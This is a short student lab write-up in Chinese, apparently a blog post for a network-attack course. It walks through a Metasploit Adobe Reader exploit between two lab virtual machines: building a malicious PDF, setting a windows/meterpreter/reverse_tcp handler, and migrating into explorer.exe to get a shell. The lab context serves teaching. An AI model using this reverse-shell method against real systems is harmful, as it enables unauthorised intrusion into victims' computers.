20145329 《网络对抗技术》客户端Adobe阅读器渗透攻击

两台虚拟机:
kali ip:192.168.96.130
windows xp sp3 ip:192.168.96.133

  • 1.kali下打开显示隐藏文件

  • 2.在kali终端中开启msfconsole。

  • 3.进入该漏洞模块并设置攻击有效载荷

  • 4.查看需要需要设置的数据,并设置相应的参数

  • 5.查看设置的参数信息

  • 6.打开exploit生成渗透攻击的pdf文件

  • 7.将渗透文件发送到靶机,使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。

  • 8、使用set payload windows/meterpreter/reverse_tcp建立一个反向连接,并设置相关的端口、ip等信息,需要与之前生成渗透文件的设置一样

  • 9.靶机打开pdf文件,攻击机启动exploit

  • 10.sysinfo可以查看到靶机信息(忘了截图)

  • 11.使用ps查看当前进程,并找到explorer.exe的进程号转移到改进程号,输入图shell,获取靶机的shell

posted @ 2017-04-16 20:35  20145329吉东云  阅读(161)  评论(0编辑  收藏  举报